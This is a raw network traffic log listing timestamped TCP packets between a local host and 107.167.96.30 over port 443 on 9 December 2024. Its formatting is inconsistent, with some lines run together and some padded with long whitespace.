                                                                                                                                                                          Dec 9, 2024 17:54:03.856947899 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.856976032 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.856997967 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.003623962 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.003654003 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.003711939 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.003739119 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.003766060 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.003789902 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.010325909 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.010351896 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.010389090 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.010395050 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.010454893 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.016221046 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.016246080 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.016329050 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.016334057 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.016387939 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.023098946 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.023123980 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.023171902 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.023176908 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.023231030 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.030457973 CET44349824107.167.96.30192.168.2.4
Dec 9, 2024 17:54:04.030481100 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.030529976 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.030551910 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.030570984 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.030596018 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.036351919 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.036380053 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.036427021 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.036451101 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.036469936 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.036489964 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.043082952 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.043112040 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.043154955 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.043163061 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.043200970 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.043224096 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.049124956 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.049154043 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.049201012 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.049206018 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.049247026 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.325830936 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.325845957 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.325871944 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.325928926 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.325942993 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.325965881 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.325970888 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.325979948 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.325993061 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.325999975 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.326132059 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.326138973 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.326214075 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.326232910 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.326235056 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.326245070 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.326257944 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.326297998 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.326307058 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.326322079 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.326370955 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.326374054 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.326405048 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.326422930 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.326426029 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.326431990 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.326502085 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.326502085 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.389585972 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.389607906 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.389657021 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.389673948 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.389708996 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.389725924 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.396810055 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.396833897 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.396874905 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.396883965 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.396929979 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.397012949 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.401415110 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.401439905 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.401489019 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.401494980 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.401520967 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.401532888 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.408057928 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.408077002 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.408118963 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.408128023 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.408184052 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.408184052 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.414870977 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.414891005 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.414946079 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.414952993 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.415067911 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.445249081 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.445271969 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.445365906 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.445384026 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.445444107 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.447329998 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.447352886 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.447427034 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.447432995 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.447500944 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.448183060 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.448203087 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.448249102 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.448254108 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.448275089 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.448352098 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.580476999 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.580503941 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.580557108 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.580569029 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.580621004 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.580743074 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.587595940 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.587613106 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.587675095 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.587680101 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.587843895 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.594201088 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.594213009 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.594275951 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.594280005 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.594544888 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.600195885 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.600213051 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.600263119 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.600266933 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.600327015 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.606978893 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.606995106 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.607058048 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.607062101 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.607250929 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.615989923 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.616007090 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.616066933 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.616070986 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.616295099 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.622148991 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.622165918 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.622461081 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.622464895 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.622631073 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.629378080 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.629483938 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.630352020 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.630419970 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.772912979 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.772939920 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.772979975 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.772993088 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.773046017 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.779810905 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.779827118 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.779951096 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.779956102 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.780065060 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.786916971 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.786931992 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.787297964 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.787302971 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.787405014 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.793205023 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.793222904 CET  443  49824  107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:04.793287039 CET  49824  443  192.168.2.4  107.167.96.30
Dec 9, 2024 17:54:04.793292046 CET  443  49824  107.167.96.30  192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.793314934 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.793342113 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.799360037 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.799379110 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.799417973 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.799422026 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.799464941 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.805793047 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.805811882 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.805877924 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.805882931 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.805979013 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.812663078 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.812678099 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.812727928 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.812732935 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.812772989 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.812791109 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.823344946 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.823362112 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.823426008 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.823431015 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.823534012 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.965764046 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.965785027 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.965897083 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.965897083 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.965910912 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.966864109 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.972402096 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.972419024 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.972482920 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.972489119 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.972842932 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.979286909 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.979304075 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.979357004 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.979362965 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.981726885 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.985291958 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.985307932 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.985404968 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.985404968 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.985410929 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.985570908 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.992280960 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.992296934 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.993715048 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.993720055 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.994112968 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.998934984 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.998951912 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.999025106 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.999028921 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.999144077 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.005433083 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.005449057 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.005500078 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.005503893 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.005542994 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.015285969 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.015301943 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.017714977 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.017719984 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.018107891 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.166469097 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.166495085 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.166551113 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.166563034 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.166589022 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.166667938 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.173537970 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.173557997 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.173624039 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.173633099 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.173645973 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.173733950 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.180522919 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.180546999 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.180572033 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.180583954 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.180615902 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.180641890 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.186069965 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.186091900 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.186139107 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.186151028 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.186202049 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.186202049 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.192903042 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.192925930 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.193027973 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.193028927 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.193036079 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.193085909 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.199744940 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.199760914 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.199856043 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.199862957 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.199908018 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.206346035 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.206362963 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.206481934 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.206490040 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.206507921 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.206531048 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.212912083 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.212928057 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.212970018 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.212975979 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.213005066 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.213027954 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.358756065 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.358781099 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.358844042 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.358865023 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.358897924 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.358983040 CET49824443192.168.2.4107.167.96.30
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 9, 2024 17:54:05.366303921 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.366333008 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.366405964 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.366415977 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.366435051 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.366461992 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.372230053 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.372251034 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.372426033 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.372432947 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.372550964 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.379478931 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.379496098 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.379571915 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.379579067 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.379853010 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.385277987 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.385288000 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.385365009 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.385371923 CET   443          49824      107.167.96.30  192.168.2.4
